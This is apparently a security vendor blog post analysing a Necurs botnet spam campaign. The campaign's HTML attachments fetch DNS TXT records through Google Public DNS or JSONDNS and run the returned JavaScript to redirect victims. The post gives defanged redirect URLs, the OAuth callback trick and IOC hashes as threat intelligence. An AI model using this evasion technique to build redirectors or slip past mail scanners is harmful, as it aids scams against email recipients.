Loading...
Blogs & Stories

SpiderLabs Blog

Attracting more than a half-million annual readers, this is the security community's go-to destination for technical breakdowns of the latest threats, critical vulnerability disclosures and cutting-edge research.

Necurs Spam uses DNS TXT Records for Redirection

Recently we noticed the Necurs botnet launching a small spam campaign with a HTML redirector as an attachment. The HTML is crafted to perform a DNS query to the spammer’s domain, obtain the DNS TXT Record and execute data within that record. This leads to redirection to unwanted advertisements and scam webpages. This is the first time we have seen this botnet delve into this strategy.

The emails spammed by Necurs had a subject “Delivery <Number>”.  The email body is obfuscated using Cyrillic characters.

Email_body_cyrillic_encoded
Figure 1: Trustwave SEG Console displaying the body of the email obfuscated with Cyrillic characters.

The emails have a single attachment named “invoic-<random alphanumeric>.html”. There are two versions of the HTML – one which renders a simple text that reads “Loading…” and executes a query to Google Public DNS, while the other type, without rendered text, uses JSONDNS for redirection. Let's delve into the analysis of these files below.

Attachment_renderedtext
Figure 2: Trustwave SEG Console displaying the first version of the HTML attachment -“invoic-B2448B.html” renders the text “Loading…”

Attachment Type 1: Using Google Public DNS

The HTML attachment has a meta and script tag. The content of the meta tag contains some JavaScript which will be executed through the script tag. The JavaScript performs a DNS query on the spammer’s domain and obtains the DNS TXT Record – machine-readable data about the domain. The data entry obtained from the DNS response will, in turn, be executed.

Summary
Figure 3: The source code of the HTML attachment “invoic-B2448B.html” with snapshots of its behavior

The HTML “invoic-B2448B.html” shown in Figure 1 and 2 contains a script tag that utilizes Google’s OAuth  2.0 API revokeToken function to execute the obfuscated JavaScript found inside the meta tag.

When the HTML attachment is executed, the Google API revokeToken() via the script URL hxxp://accounts[.]google[.]com/o/oauth2/revoke?callback=ccc() will execute the function “ccc” inside  the JavaScript. This function will first perform a DNS query via Google Public DNS using the decrypted URL at var v and retrieve its DNS TXT Record. Then, it will execute the 0xD entry of the DNS TXT Record which is the data entry.

In figure 3, the data entry contains the JavaScript code that will launch hxxp://www[.]21732bfg36abp[.]kellogglawassociatesp[.]com/30098.html via the windows.location.replace command. This chain of events ultimately leads to the browser redirecting to an unwanted advertisement webpage.

Attachment Type 2: Using opensource JSONDNS

The other type of HTML attachment is simpler and smaller by using JSONDNS, an opensource DNS Service platform that performs DNS queries via HTTP.

Jsonp_emailsample
Figure 4: Trustwave SEG Console displaying the source code of the second version of the HTML attachment - “invoic-9094.html


In  Figure 4, the HTML attachment "invoic-9094.html” directly performs the DNS query at the script tag, then retrieves and passes the DNS TXT Record to the JavaScript function jsonp(json).

Jsonp
Figure 5: The DNS TXT Record response using JSONDNS performed by the sample shown in Figure 4


The content of the rdata entry is a windows.location.replace JavaScript command. To execute this is the sole function of function jsonp(json).

Jsondns_js
Figure 6: The javaScript function of “invoic-9094.html” shown in Figure 4


Unfortunately for this HTML sample, the browser will not be able to display the intended URL as the command windows.location.replace is called twice. The URL in the browser will be replaced with the value of the rdata entry.

Conclusion

Necurs is still sending out spam campaigns from time to time, although the output from this botnet is now sporadic and small in volume. Though this campaign is low in volume, it is significant since it shows that the people behind this botnet are trying out new stuff. Now, they are exploring the world of DNS and have utilized the DNS TXT Record to hide the malicious/unwanted URLs from the email gateway scanners. Furthermore, they tried out the opensource JSONDNS which has support on cross-domain access (bypasses the same-origin-policy security model). Perhaps the operators are at an early stage of development of this type of spam campaign. The payload for many previous Necurs campaigns was malware, and it would not take much for the payload to switch from ‘harmless’ advertising to something more sinister.

While new to Necurs, the use of DNS TXT Record strategy is not new. For example, we observed that the Carbanak campaign last April 2017 also uses DNS TXT Record to obtain and execute the malware on the compromised system.

IOCs

invoic-B2448B.html         MD5=78809ebe7b7439cb7b3377284e656258
invoic-9094.html              MD5=02f16039651a529f1f7eceb53aecd126

Recent SpiderLabs Blog Posts